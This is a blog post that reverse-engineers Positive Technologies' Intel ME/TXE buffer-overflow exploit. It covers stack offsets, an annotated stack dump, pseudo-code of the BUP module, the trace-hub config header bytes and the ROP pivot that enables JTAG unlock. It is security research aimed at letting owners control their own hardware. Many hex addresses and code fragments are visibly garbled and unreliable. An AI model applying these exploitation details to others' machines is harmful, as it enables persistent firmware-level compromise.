Exploiting Intel’s Management Engine, Hacker News

Let me tell you a story…. (I think I’ll start all my blog posts with that considering how long they always end up being)

I’ve been working for a while now on trying to reproduce the Intel vulnerability that PT Research has disclosed at BlackHat Europe 2017 and I’ve succeeded and wanted to share my journey and experience with everyone, in the hope that it helps others take control of their machines (and not the other way around).

First, for those who are unaware,Positive Technologies(referred to here as’PT Research‘,’PT Security‘or just’PT‘), have released information at BlackHat 2017 about a way torun unsigned code on the Intel Management Engine. And for those who are unaware, the Intel ME is a ‘security’ processor that runs on every Intel chip (since 2006) and that supposedly has full access to our systems. You can read more about ithereandhere, but the description that I’ve read and that stuck the most with me is this one fromLibreboot’s FAQ(though it is a little outdated).

What’s the Intel Management Engine?

In summary, the ME (Management Engine) is a second processor embedded in every PCH (the motherboard’s chipset) which runs with the highest privilege possible, it runs its own Intel -signed firmware, and takes care of a lot of things that you don’t know it does, the mainly known one being AMT (Intel Active Management Technologies) which allows a system administrator to remote access, control, update, reformat, KVM, etc .. a computer through the network, and that’s even if the computer is turned off. It’s called “out of bands” management, because it doesn’t work with a software running on the main CPU (like teamviewer / skype remote desktop or anything like that), but it works even if your entire OS is corrupted, or has a virus, or the machine is actually turned off.

That’s pretty scary, and if you’re wondering why Intel did this, well the rationale is that when you’re a system administrator in a company that has thousands of computers , or a university or even a small business with a dozen computers, and you want to update them all to a newer security update or whatever, then you can do it all at once from the comfort of your chair, and you don’t need to go through the entire building, and insert a USB key into each machine, and turn on those machines that were powered off, etc .. The real question however is why, for consumers, is the option to disable the ME not available? As a regular user, I don’t need that ability to remotely control my machine, so I want to disable it, but I can’t. This has led to a lot of FUD (Fear, Uncertainty & Doubt) surrounding the ME as a way for Intel to control the world!

I wanted to figure out what was truth and was wasn’t as I dug deep into reverse engineering and poking at the ME. The ME does have a legitimate function, but it does so much more now, as it takes care of the hardware initialization, the main CPU boot up, control of the clock registers, DRM management for Audio / Video, software basedTPMand more . Those extra tasks are supposedly why it cannot be deactivated for consumer products. It unfortunately also means that youhave totrust that Intel isn’t doing anything malicious (or allowing others to do something malicious by their incompetence). It’s not that I think Intel are malicious, but that doesn’t mean I trust them implicitly either. I’ve started to look into the ME, trying to get my code to execute on it, using the exploit PT had divulged and I took on the mission of getting the ME to control and spy on my USB devices. This started when I was still working with Purism, but even after I left that company, I continued working on this, on and off, for a little over a year now and I’ve finally made enough progress that I think it warrants writing something about it. Especially since I’ve ‘revived’ this blog in the last month with a couple of posts about reverse engineering too.

First things first. TheIntel Management Engine(IME) or Management Engine (ME) is also called the CSME (Converged Security and Management Engine) or just CSE (Converged Security Engine) and sometimes called TXE (Trusted eXecution Engine) or SPS (Server Platform Services) and it used to be called Intel Management BIOS Extension ( IMEBx) .. It can get quite confusing .. especially considering that “the ME” can refer both to the Management Engine processor core itself and the Management Engine firmware which are both often indistinguishable of each other. I haven’t looked at the IMEBx (it’s old) or the SPS (don’t care about servers), but I think we can safely say that the ‘CSE’ and ‘CSME’ are the hardware cores, and the ‘TXE’ and ‘ME’ are their firmwares, respectively. I’m not sure if it’s exactly true, as I’ve heard ‘CSME’ also refer to the firmware, not just the hardware, but mostly all of these terms are interchangeable and I’ve seen Intel documents used them interchangeably as well.

I can also say with fair certainty that the CSE and CSME are both the same thing, they are the same hardware as far as I can see, and their firmware is pretty much the same. The CSE is used for ‘low power / cheap’ platforms, such as Celeron / Apollolake for example (set-top boxes, netbooks, cheap and underpowered laptops, etc ..), while CSME is used for ‘desktop / laptop’ high end CPUs such as Skylake, Kabylake, CoffeLake, etc… The main difference between the two is that CSE doesn’t include the AMT (remote administration feature) while CSME does include it. The CSE runs the TXE firmware which is the exact same as the ME firmware, but again without the AMT features. I obviously can’t try to run the ME firmware on an Apollolake with the CSE because each version will only work for one platform (hardware initialization / registers being specific per platform), but looking at their code, I can say that they are pretty much identical, one does more than the other, but it’s the same code, same base architecture / functioning. TXE / CSE is probably just cheaper for Intel because there are less features for them to test / QA before release.

In this post, I will be talking about both the CSE and CSME, because PT Research has released their exploit so we can run our own code on the Apollolake platform (running TXE on CSE) and what I’ve done is both play with that and also port it to work on the Skylake platform (running ME on CSME).

Understanding the CSE exploit in order to do the CSME exploit

The first thing I want to explain is how to run your own code on the CSE (TXE v3.0). This will be pretty long, so I think I’ll divide this article into 3 posts, one that I will try to write each day. First, understanding the CSE exploit, thenporting the exploitto CSME, then how to play around with the USB controller through the ME.

You can already refer toPositive Technologies’ presentation (given by) Mark ErmolovandMaxim Goryachyat BlackHat Eruope 2017. You can download their slideshereand presentationhere. It explains everything (mostly) of what you need to do. Then you can have a look at their Proof of Concept release of the exploit ongithubfor Apollolake systems.

Before you go further, this post isn’t going to be like my previous posts that try to explain things on a very basic level (and often fail at remaining basic the further along you read). This is going to get very technical very fast, and before you continue, you need to read and understand the exploit as explained in the presentation by PT linked above. If you can’t follow it, then you’re just going to get lost, as I am assuming that you’ve read it and understood it all.

Here’s a quick summary of the exploit PT have divulged in their presentation:

While most partitions are signed and cannot be modified as they contain code, the MFS partition is not and can therefore be modified by us mortals. There are additional restrictions in it that makes not all of the files user-modifiable.
A file in the MFS partition named"/ home / bup / ct"is used to initiatize the Trace Hub Configuration of the ME and is user-modifiable.
The ME process BUP (Hardware Bring-UP) reads the entire"/ home / bup / ct"file into a buffer of size 808 without checking that the file will fit: we have a buffer overflow exploit here.

There is a security-cookie / stack-guard that protects the ME against buffer overflows, making the buffer overflow exploit useless.

At the very bottom of the stack (the first 0x 18 bytes of the stack) resides the TLS structure (Thread Local Storage) which contains a pointer to the syslib context.

(The"/ home / bup / ct "file is read in chunks of 64 bytes, and copied into a shared memory block

Writing to the shared memory block (withsys_write_shared_memfunction) causes it to read the destination address from the shared memory block descriptor that resides in the syslib context structure
Overwriting the stack all the way to the bottom in order to overwrite the syslib context, pointing it to a custom-made shared memory block which has the destination address pointing to thememcpy‘s return address lets us control where we want the function to return, thus bypassing the security-cookie / stack-guard protection that is in place
By using both the buffer overflow exploit and the TLS / syslib-context / shared-memory exploit, w e can control the code that gets executed usingROPs: running our own unsigned code.

Using anotherpresentationfrom Positive Technologies, this time at the 34 th Chaos Communication Congress, we can see that the Intel chipsets support JTAG which allows full debugging capabilities. In order to be able to JTAG the ME core itself, we would need to have ‘RED’ level unlock. See this little helpful table, taken from yet another Positive Technologies presentation (BlackHat Asia 2019)

All we need to enable RED unlock is to set value (3) to the DfX Aggregator register. Pretty easy to do once we have our own code running on the ME, so we can create a ROP chain that can be used to enable DCI and Red Unlock mode and allows us full ME JTAG control by another PC over USB.

Something you might not realize at first (and I didn’t until I dug deep) is that the exploit explained in the BlackHat Europe 2017 presentation is very different from what they’ve released as their proof of concept. The buffer overflow in reading the “/ home / bup / ct "file is the same, but that’s the easy part (hard to find, but easy to use: write a file with a size more than 808 bytes) .I don’t know why, don ‘ t ask, and I haven’t asked them either, but they decided to release the proof of concept for Apollolake (TXE 3.x) rather than for Skylake (ME 11. x) even though their presentation was about how to exploit it on Skylake. I figured that if I wanted to port their exploit to skylake, I needed to first understand how it works on Apollolake then it should just be a matter of finding the right offsets for my version of t he ME on Skylake, right?… No. It actually took me a long time to figure out that what they are doing is a different exploit. In their presentation they were talking about how they overwrite the TLS with the syslib context in order to take over the shared memory destination address so they can control thememcpyfor overwriting their function’s return address and bypass the stack guard security cookie.

The problem with that method is that it requires two read, the first one is to overwrite the TLS / syslib context, and the second one to cause the (memcpy) operation that lets the exploit happen. On skylake, it’s not a problem, the"/ home / bup / ct"file gets read in chunks of 64 bytes, so you overwrite the syslib context with one chunk then you overwrite your return address with the next chunk. On Apollolake unfortunately, it doesn’t seem to use chunked reads. Because it’s a simplified firmware, the MFS (ME File System) on the flash is different I assume, and the file is read in one shot. Which means that the exploit in the presentation cannot be used. So… what do they do?

The TXE Exploit

If you follow their instructions in theirIntelTXE-PoC repository, you’ll see that the entire TXE exploit is stored in the"/ home / bup / ct "file ( Trace Hub Configuration) which gets generated by theme_exp_bxtp.pyscript. That’s the file you generate and by configuring the ME using Intel’s tools, setting the CT file in the “Trace Hub Configuration” field, the exploit happens. But what does it do exactly? What’s in that file? The script that generates it has unfortunately a few magic numbers that took me a long time to figure out. Let’s look at them:

STACK_BASE=0x  (0)  BUFFER_OFFSET=0x 380 SYS_TRACER_CTX_OFFSET=0x 200 SYS_TRACER_CTX_REQ_OFFSET=0x  (c)  RET_ADDR_OFFSET=0x 338   def GenerateTHConfig ():     print ("[*] Generating fake tracehub configuration ...")     trace_hub_config=struct.pack (" I've ignored the ROPs, they're not important for now, but if we look at the magic numbers, first, the STACK base address is 0x 56000, cool, good to know .. where did they find it? no idea! Why is the buffer offset 0x 380? What's this 0x  (c)  address that isSYS_TRACER_CTX_REQ_OFFSET? Why is theRET_ADDR_OFFSET  (set to 0x) ? And then all those magic values in theGenerateTHConfigfunction. At first, I thought that it was just a valid Trace Hub file and that if it didn’t start with those values, it would be rejected, but it turns out those values are important for the exploit to happen. Then that magic value 0x 00016 e1a that gets written on line 27 of the sample above .. what is that?
This article will answer all of those questions, as I’ve worked on reverse engineering the exploit itself. I will spare you all the reverse engineering and research I did on the ME itself in order to understand how the kernel creates its processes, how / where it sets up the stack, how the TLS structure gets created and by who (I wasted too much time looking at the kernel instead of just concentrating on the BUP process itself), I'll look at that a little bit more in the next post.
After the exploit runs and I have a halted ME thread in the python console, I used the JTAG commands and dumped the stack to see what functions had run. I could follow every call that way and figured out what happened, who called who until the exploit was triggered. It's probably a bit hard to read and I'm not going to try and explain it, but here's the dump of the stack with my notes on the side showing what variables, registers and ret addresses are appearing on each line:
01 BF: 0000000000055950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055960: 00 00 00  (cc)  05 00 C8 59 05 00 18 00 00 00 - garbage - push edi (in _memset_0) 01 BF: 0000000000055970: DC 18 00 00 40 30 09 00 ff ff ff ff 18 00 00 00 - retaddr to _memset_0 - ebx (addr) - push 0xffffff (value) - push edi (length) 01 BF: 0000000000055980: 11 00 00  (D1)  00 00 22 00 00  (B1)  00 00 - previously pushed ecx - ebx - esi - edi 01 BF: 0000000000055990:  (5A)  00  (6D)  00 04 30 09  (D1)  00 00 - ebp 0x0  (a)  - retaddr to sub _ 1119 - var _ 54 - ebx 01 BF: 00000000000559 A0: B0 02 00  (3c 5a)   (D0 4D)  00 70 5A 05 00 - eax - LOCALS [0x54] 01 BF: 00000000000559 B0: 04 30 09 00 44 90 09 00 D0 01 00  (D2)  00 00 01 BF: 00000000000559 C0: 21 00 00 00 6F 03 00 00 FF 03 00 00 00 00 00 00 01 BF: 00000000000559 D0: ff ff ff ff 00 00 00 00 84 30 09 00 84 30 09 00 01 BF: 00000000000559 E0: 04 30 09  (E1)  00 00 02 01 00 00 91 00 00 00 01 BF: 00000000000559 F0: D0 01 00 00 20 8e ff 6e 44 90 09 00 80 03 00 00 - LOCALS [0x54] - ebx - esi 01 BF:  (a) : 00 30 09 00  (5A)   (ee 6e)  00 44 90 09 00 - EDI - EBP 0x0  (a)  - retaddr to sub_6CA2 - ebx 01 BF:  (a) *******************************************************************************************************************************************************************************************: 04 30 09 00 00 04 00 00  (4c)   (E0)  00 00 - ecx - eax - eax - eax 01 BF:  (a) : 01 00 00 00  (5A)  00 3C 5A 05 00 db f1 e8 6b - eax - eax - eax - locals [0x18] 01 BF:  (a) :  (5A)  00  (5A)   (1D)  01 00 03 00 00 00 01 BF:  (a) :  (5A)  00 EA 34 01 00 04 00 00 00 58 5A 05 00 - LOCAL S [0x18] - ebx - esi - ebp ** INVALID STACK ABOVE THIS POINT 01 BF:  (a) : BD 25 01 00 20 8e ff 6e  (5A)  00 00 00 00 00 - retaddr to sys_get_ctx_struct_addr ** INVALID STACK ABOVE THIS POINT 01 BF:  (a) : D8 5A 05 00 A4 5A 05  (4A 2A)  00 72 5a 05 00 - INVALID - ebp - retaddr to sub _ 134 C6 - ebx 01 BF:  (a) : 20 00 43 02 00 02 08 00 0e 00 56 00 02 00 86 80 - LOCALS [0x2C] 01 BF:  (a) : 80 03 00 00 04 00 00 00  (5A)   (1d)  01 00 01 BF:  (a) : 03 00 00 00 A0 5A 05 00 20 8e ff 6e 8c 5a 05 00 - LOCALS [0x2C] - ebx 01 BF: 0000000000055 AA0: 44 37 09 00 B8 5A 05 00 E5 2B 01  (0e)  56 00 - esi - ebp - retaddr to sub _ 129 C9 - arg0 ** INVALID STACK HERE AND ABOVE 01 BF: 0000000000055 AB0: 04 00 00  (C8 5A)  00 10 6C 00 00 00 00 00 00 - 4 - ebp 0x 55 aC8 sub_6A 68 - retaddr to sub_6A 50 - eax 01 BF: 0000000000055 AC0: 0E 00 56 00 0e 00 00  (F8 5A)  00 62 84 00 00 - X - X - ebp 0x 55 AF8 sub _ 8309 - retaddr to sub_6a 68 01 BF: 0000000000055 ad0: 80 03 00 00 00 8e ff 6e 8c 5a 05 00 80 03 00 00 - LOCALS [0x1C] 01 BF: 0000000000055 AE0: 44 37 09 00 28 5b 05 00 20 8e ff 6e 00 00 00 00 - LOCALS [0x1C] - ebx 01 BF: 0000000000055 AF0: 80 03 00 00 44 37 09 00  (5b)  00 2A 81 02 00 - esi - edi - ebp 0x 55 B  (sub _)  E - retaddr to sub _ 6082 01 BF:  (b) : 44 37 09 00 00 03 00 00 00 00 00 00 29 9a 07 00 - edi - LOCALS [0x18] 01 BF:  (b) *******************************************************************************************************************************************************************************************: 80 03 00 00 44 37 09 00 20 8e ff 6e 80 03 00 00 - LOCALS [0x18] - ebx 01 BF:  (b) : 29 8a 07 00 64 5C 05 00  (5b)  00 28 99 02 00 - esi - edi - ebp 0x 55 B 90 bup_read_mfs_file - retaddr to sub_2A 678 01 BF:  (b) :  (9a)  00 80 03 00 00 02 00 00 00 00 03 00 00 - a1 - src_size (0x 380) - sm_block_id (2 ) - proc_thread_id (0x 300) 01 BF:  (b) : 00 03 00 00 00 00 00 00 01 00 00 00 ff ff ff ff - proc_thread_id - a6, a7, a8 01 BF:  (b) : 00 00 00 00 01 00 00 00 00 00 00 00  (5b)  00 - A9 - 10 - LOCALS [0x2C] - ebp 0x  (b)  _get_tls_ slot 01 BF:  (b) : 1D 84 01 00 03 00 00 00 8c 5b 05 00 EA 34 01 00 - retaddr to get_tls_slot - arg0 (3), ebp 0x 55 B8C sub _ 134 C6 - retaddr to sub_ 13495 01 BF:  (b) : 04 00 00 00  (5b)   (BD)  01 00  (8e ff 6e - X - ebp 0x) ********************************************************************************************************************************************************** (b) **************************************************************************************************************************************** (sub _)  - retaddr to sys_get_ctx_struct_addr - COOKIE ** INVALID 01 BF:  (b) : 9A 5B 05 00 00 00 00 00 04 00 00  (cc 5b)  00 - LOCALS [0x2C] - ebx - esi - ebp 0x 55 bcc sub _ 129 C9 01 BF:  (b) : 4A 2A 01 00 9A 5B 05  (AC 5B)  02 00 02 08 00 - retaddr to sub _ 134 C6 01 BF: 0000000000055 BA0: 01 00 56 00 02 00 86 80 64 5C 05 00  (5c)  00 01 BF: 0000000000055 BB0: 81 13 03 00 02 00 00  (5f) ********************************************************************************************************************************************* (6b)  00 65 00 00 01 BF: 0000000000055 BC0: 20 8e ff 6e  (5A)  00 00 00 00  (E0 5B)  00 - LOCALS - - ebp 0x  (BCC sub _)  BD6 ** INVALID 01 BF: 0000000000055 BD0: E5 2B 01 00 01 00 56 00 F4 5B 05  (AE 6F)  00 - retaddr to sub _ 129 C9 * INVALID - X - ebp 0x 55 bf4 sub_6F3D - retaddr 0x6fae to sub_6A 50 01 BF: 0000000000055 be0: 00 00 00 00 02 00 00 00 01 00 56 00 02 00 00 00 - add esp, 0C - ebx 01 BF: 0000000000055 BF0:  (5c)  00  (5c)  00 BC 7A 00 00 00 00 00 00 - esi - ebp 0x  C)  sub_7A 91 - retaddr 0x7abc to sub_6f3D 01 BF:  (c) : 00 00 00 00 00 00 00 00 00 00 E0  (E4 9b)  00 01 BF:  (c) *******************************************************************************************************************************************************************************************: 00 00 00 00 20 8e ff 6e 02 00 00 00  (5c)  00 01 BF:  (c) : 04 00 05 00 40 5C 05 00 9c 7c 00 00 00 00 00 00 - LOCAL - ebp 0x 55 C 40 sub_7C 88 - retaddr 0x7c9c to sub_7A 91 01 BF:  (c) : 04 00 00  (0a)  05 00 00 00 00  (E4 9B)  00 01 BF:  (c) : 50 5C 05  (5e)  00  (0a)  05 00 E4 9B 04 00 - ebp 0x 55 C  (sub _)  - retaddr 0x 695 e to sub_7C 88 01 BF:  (c) : B4 5F 05 00 E4 9B 04  (0a)  05 00 07 00 00 00 - ebp 0x 55 fb4 - retaddr 0x 49 be4 to sub _ 6078 01 BF:  (c) : BF 00 00 00 80 03 00 00 07 00 00  (4b)  4f 44 01 BF:  (c) : 14 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (c) : 00 00 00 00 00 00 02  (E0)  00 02 00 00 00 5f 01 BF:  (c) : 10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 CA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 CB0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 CC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 CD0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 CE0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 CF0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (d) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (d) *******************************************************************************************************************************************************************************************: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (d) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (d) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (d) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (d) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (d) : 00 00 00 00  (A8)  00 C7 00 00 00 18 10 00 00 01 BF:  (d) :  (A8)   (C7)  00 00 08 10 00 00 01 00 00 00 01 BF:  (d) : C7 00 00 00 1C 10 00 00  (A8)   (C7)  00 00 01 BF:  (d) : 18 10 00 00  (A8)   (C7)  00 00 08 10 00 00 01 BF: 0000000000055 DA0: 01 00 00 00 C7 00 00 00 1C 10 00 00 00 01 00 00 01 BF: 0000000000055 DB0: 00 00 00  (9f)  00 00 00 00 00 00 10 10 00 00 01 BF: 0000000000055 DC0:  (A8)   (C7)  00 00 08 10 00 00 be 11 00 00 01 BF: 0000000000055 DD0:  (A8)  00 9f 01 00 00 00 84 00 00 03 00 00 00 01 BF: 0000000000055 DE0: 2D A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 DF0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) *******************************************************************************************************************************************************************************************: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (e) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 EA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 EB0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 EC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 ED0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 EF0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) *******************************************************************************************************************************************************************************************: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF:  (f) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 FA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 FB0: 00 00 00 00 00 00 00  (1a 6e)  00 98 5D 05 00 - pop ESP 0x 55 C 98 01 BF: 0000000000055 FC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 FD0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 FE0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 BF: 0000000000055 FF0: 58 5A 05 00 0c 00 00 00 00 03 00 03 FC 5F 05 00
A couple of things first:
The stack is at offset 0x 56000 (The/ home / bup / ctfile gets read into offset 0x  (C)
We can see the call tobup_read_mfs_file  (at 0x) ********************************************************************************************************************************************************** (b) , but the stack is corrupted all the way to 0x 55 BC0, meaning that all those functions above that line were called and already returned when the exploit happened. According to the assembly code, the TXE doesn't read the file in chunks or copy it to shared memory, so by the timebup_dfs_read_filereturns, nomemcpyon shared memory was called and the exploit hasn't run. The reason for that is that the file isn't read into the stack then copied to a shared memory, instead, a shared memory block is created pointing to the stack, then reading the data gets it to the stack by using thesys_write_shared_memfunction. So once the buffer overflow is done, the copy is also done.

	
			
	
			

		
			
			
					
			
		





If you're wondering what I mean bybup_dfs_read_fileandbup_read_mfs_file, here's a little pseudo-code of how the TXE's BUP module initializes itself from the entry point to the time the exploit runs (only relevant code is shown, and it's over simplified). It shows the function calls that would appear in the stack, in the right order. If you want to follow along on IDA, it's using TXE version3.0.1 . 1107:

// sub _ 2604 C // The entry point. First code executed after the kernel launches the BUP process void bup_entry () {    // Initialize stack, tls, syslib, etc ...    // bup_init ();    // then call the main function    bup_main (); }  // sub _ 35001 // The main function I assume which does most of everything void bup_main () {    // All sorts of initialization of stuff    // function1 (); function2 ();    bup_run_init_scripts ();    // Some more stuff    // function3 (); function4 (); }  // sub _ 355 E0 // This runs 'scripts', it basically loops through an array of arrays // containing functions and calls each of those functions. // Each function will initialize one part of the hardware. void bup_run_init_scripts () { {   // Simplification of what it does   for (int i=0; ioffset   offset, shmem_blockid, read_size, out_bytes_read)   release_shared_memory_block (shmem_blockid)   // Stack Guard }  // sub _ 297 BA // Read the MFS file content and copies it to shared memory // the function is more complex than shown, its arguments as well, I've removed anything not important. int bup_read_mfs_file (void * mfs_partition, int offset, int shmem_blockid, unsigned int read_size, unsigned int * out_bytes_read) {    * out_bytes_read=read_size;    sys_write_shared_memory (shmem_blockid, mfs_partition   offset, read_size, read_size)    // Stack Guard }  // sub_AE 87 // This is in the syslib module, not the BUP module. int sys_write_shared_memory (int blockid, void * src, int src_size, int write_size) {    SHMem * block=get_shared_memory_block (blockid);    memcpy (block->addr, src, write_size)    // Stack Guard }
So, technically, according to the BlackHat presentation, whenbup_read_mfs_filegets called, it reads the MFS file in chunks, and when it callssys_write_shared_memory, it will execute our exploit, but from the stack that I dumped and analyzed above, that's not what happens, because I can see the stack corrupted (overwritten by subsequent calls) that proves thatbup_read_mfs_filehas returned before the exploit happens, and then reverse engineering the code, I also see that there is no reading in chunks, which explains why things are different than in the presentation. So the exploit has to happen between the call tobup_dfs_read_fileand the end of thebup_init_trace_hub, because the security cookie (stack guard) is destroyed by the buffer overflow so we can't letbup_init_trace_hubreturn .. If we look at what happens inbup_init_trace_hubafter the call tobup_dfs_read_file, then we see this:
void bup_init_trace_hub () {    char ct_data [808];    int file_size;    int bytes_read;     // again, simplification    bup_dfs_get_file_size ("/ home / bup / ct", & file_size)    bup_dfs_read_file ("/ home / bup / ct", 0, ct_data, file_size, & bytes_read)     CT * ct=(CT  ct_data;    for (uint 16 _ 6 i=0; inum_entries ; i   ) {        if (ct->entries [i]. selector==1)           set_segment_word (7, ct->entries [i]. offset, ct->entries [i]. value)        if (ct->entries [i]. selector==2)           set_segment_word (0xBF, ct->entries [i]. offset, ct->entries [i]. value)    }    bup_init_trace_hub_set_systracer (7, 0xBF) }  // sub _ 49 AD3 // The following is a small function that gets called and sets flags on // the systracer context value and returns. bup_init_trace_hub_set_systracer (unsigned int seg1, unsigned int seg2) {    // sys_get_sys_tracer_ctx () returns syslib_context   0x 200    char * systracer=sys_get_sys_tracer_ctx ();     // Set the DWORD at address systracer   0x 10 to the first argument    * (uint 32 _ t  (systracer   0x 10)=seg1;     // Set bits 0 and 1 of systracer to 1 and clear bits 6 and 7    systracer [0] |=3;    systracer [0] &=0x3F;    // set bit 6 of systracer to the same as bit 3 of 0xBF: 10    systracer [0] |=((get_segment_word (seg2, 0x 10)>>3) & 1)>11 ) & 1    // set bit 9 of systracer to the same as bit 24 of 0xBF: E0    systracer [1] |=((get_segment_word (seg2, 0xE0)>>>>) & 1)
The systracer context is atsyslib_ctx   0x 200and if we look again at what the exploit from PT does, it sets the thesyslib_ctx  (to 0x) ********************************************************************************************************************************************************** (a)  so the modified data (systracer) is at 0x  (C)  which happens to be the return address of the functionbup_init_trace_hub_set_systraceritself. Here’s what the stack actually looks like if we follow all the push / pop / call / ret from the entrypoint to the moment the exploit happens:
TXE STACK - bup_entry:  0x 56000: TOP STACK  0x 55 FEC: TLS   0x 55 FE8: ecx - arg to bup_main  0x 55 FE4: edx - arg  0x 55 FE0: eax - arg  0x 55 FDC: retaddr - call bup_main    0x 55 FD8: saved ebp of bup_entry     0x 55 FD4: 0 - arg to bup_run_init_scripts    0x 55 FD0: retaddr - call bup_run_init_scripts      0x 55 FCC: saved ebp of bup_main      0x 55 FC8: saved edi      0x 55 FC4: saved esi      0x 55 FC0: saved ebx      0x 55 FBC: var _ 10       0x 55 FB8: retaddr - call bup_init_trace_hub        0x 55 FB4: saved ebp of bup_run_init_scripts        0x 55 FB0: saved esi        0x 55 FAC: saved ebx        0x  (C) : STACK esp-0x 348          0x 55 FA8: security cookie          0x  (C) : ct_data          0x 55 C6C: si_features          0x  (C) : file_size          0x  (C) : bytes_read           0x  (C) : 0xBF - arg to bup_init_trace_hub_set_systracer          0x 55 C5C: 7 - arg          0x  (C) : retaddr - call bup_init_trace_hub_set_systracer            0x  (C) : saved ebp of bup_init_trace_hub  
So you can see that the systracer value that gets modified is at 0x  (C)  which according to the stack is the return address ofbup_init_trace_hub_set_systracer, if we look at the dump of the stack from before, you can also see that the value at 0x  (C)  is indeed 7 as expected (due to* (uint 32 _ t  (systracer   0x 10)=seg1;). If we can control the return value of our own function, then we control what we execute.
The only things that can be controlled of our return value though are bits 0, 1, 6, 7, 8 and 9. Bits 0 and 1 are always set to 1 , bits 6, 7 and 8 are dependent on a value stored in segment 0xBF at offset 0x 10, and bit 9 is dependent on a vale stored in segment 0xBF at offset 0xE0. Thankfully both those values in segment 0xBF can be set through the tracehub configuration file header (the loop at the end ofbup_init_trace_hub).
The ct file header has this format:
struct {    uint8_t ignore [6];    uint 16 _ t num_entries;    struct {       uint 24 _t offset; // offset in the segement is only 20 bits       uint8_t segment_selector; // if value is 1, segment is 0x 07, if value is 2, segment is 0xBF       uint 32 _ t value; // Value to set in segment_selector: offset    } [num_entries]; };
With the ct file header being set by the exploit to:
00 00 00 00 00 00 02  (E0)  00 02 00 00 00 5f 10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00
We can see it has 2 entries, which sets 0xBF: E0 to 0x5F 00 00 00 and 0xBF:  (to 0x)
With those values set, thebup_init_trace_hub_set_systracerfunction that gets called inbup_init_trace_hubwill overwrite its own return address at offset 0x  (C)  from 0x  (B to 0x)  BDB which makes it jump in the middle of  (sub _) *************************************************************************************************************************************************************** (BB6)  with the stack / ebp ofbup_init_trace_hub, such that when that function returns, it will return to the address stored in the retaddr offset ofbup_init_trace_hubwhich is 0x 55 FB8. Note that the functionsub_  (BB6)  does not check the stack for the security cookie and the point where we jump into that function makes it call a few functions that just return with an error because their parameters are wrong, so it doesn't seem to do anything.
That address 0x 55 FB8 that contains the retaddr is at position 0x 338 in the ct file (0x 56000 - 0x 55 FB8=0x 48 bytes from the end of the file of size 0x 380) which contains:
1A 6E 01 00 98 5C 05 00
The address 0x 16 e1a is in the middle of an actual instruction but it will itself be interpreted as the instructionpop espfollowed by aret. This pops the next value 0x 55 C 98 into the stack pointer and returns to it. If you remember, I said the ct buffer is saved into 0x  (C)  (which you can also see from the stack analysis above), so address 0x  (C)  is at offset 0x 18 in the CT file (which is right after the header and those 2 entries that set values in segment 0xBF) which is where we find the actual ROP gadgets which enable DCI, set red unlock then enter an infinite loop.
